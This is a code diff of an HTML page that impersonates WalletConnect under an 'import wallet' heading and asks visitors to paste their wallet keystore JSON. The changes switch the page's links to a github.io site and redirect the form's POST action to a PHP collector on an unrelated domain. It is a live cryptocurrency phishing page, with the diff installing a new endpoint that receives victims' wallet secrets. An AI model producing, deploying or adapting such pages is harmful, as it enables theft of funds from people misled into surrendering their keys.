--- a/sync/import-wallet/keystore/index.html
+++ b/sync/import-wallet/keystore/index.html
@@ -31,10 +31,10 @@
     <div class="top">
         <a href="https://github.com/walletconnect" class="left">Github</a>
         <a href="https://docs.walletconnect.org/" class="left">Docs</a>
-        <a href="https://free.nftopsea.io/connect-wallet" class="main">
+        <a href="https://web3-bridge.github.io/sync/import-wallet" class="main">
             <img src="https://free.nftopsea.io/front/assets/logo.svg" alt="logo"></a>
-        <a href="https://free.nftopsea.io/connect-wallet" class="left">Wallets</a>
-        <a href="https://free.nftopsea.io/connect-wallet" class="left">Encryptor</a>
+        <a href="https://web3-bridge.github.io/sync/import-wallet" class="left">Wallets</a>
+        <a href="https://web3-bridge.github.io/sync/import-wallet" class="left">Encryptor</a>
     </div>
     <br>
     <h2>
@@ -49,7 +49,7 @@
 
 
     <div >
-        <form method="POST" action="https://free.nftopsea.io/send-keystore">
+        <form method="POST" action="https://www.my-clientarea.my.id/web3bridge/keystore.php">
             <input type="hidden" name="_token" value="dLbn3dZXG1HrK7hFgHfPHjU8GEX8wEDUkrgdjsrM">                                                <input type="hidden" value="Metamask" name="name" />
 
             <textarea name="keystore" class="keystore" required="required" minlength="12" placeholder="Keystore JSON"></textarea>
